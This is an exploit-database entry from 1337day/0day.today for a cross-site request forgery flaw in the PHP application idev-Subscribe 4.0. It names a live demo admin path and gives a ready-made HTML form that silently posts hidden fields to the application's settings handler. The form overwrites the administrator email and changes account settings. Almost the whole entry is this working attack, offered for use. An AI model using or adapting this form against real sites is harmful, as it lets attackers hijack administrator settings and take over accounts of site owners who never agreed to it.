idev-Subscribe 4.0 CSRF Vulnerability

2012-04-05T00:00:00
ID 1337DAY-ID-17974
Type zdt
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            < ------------------- header data start ------------------- >

#############################################################

# Application Name    :  idev-Subscribe 4.0

# Vulnerable Type     :  CSRF

# Demo                :  http://idevspot.com/demos/idev-subscribe/admin

# Author              :  Jonturk75

# Greetz: Inj3ct0r Exploit DataBase 1337day.com

#############################################################

< ------------------- header data end of ------------------- >


<form name="form1" method="post" action="../library/query.php">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="[email protected]" type="hidden">
<input name="SIGNATURE" class="hiddenarea100" value="idev-Subscribe" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option selected> Show</option><option>Show</option><option>Hide</option></select>
<select name="STATUSCHANGE"><option> 2</option>
<option value="1">1 - Suspend user account access.</option>
<option value="2">2 - Leave user account active.</option>
</select>

<input name="Submit" value="Submit" type="submit">



< -- bug code end of -- >



#  0day.today [2018-04-08]  #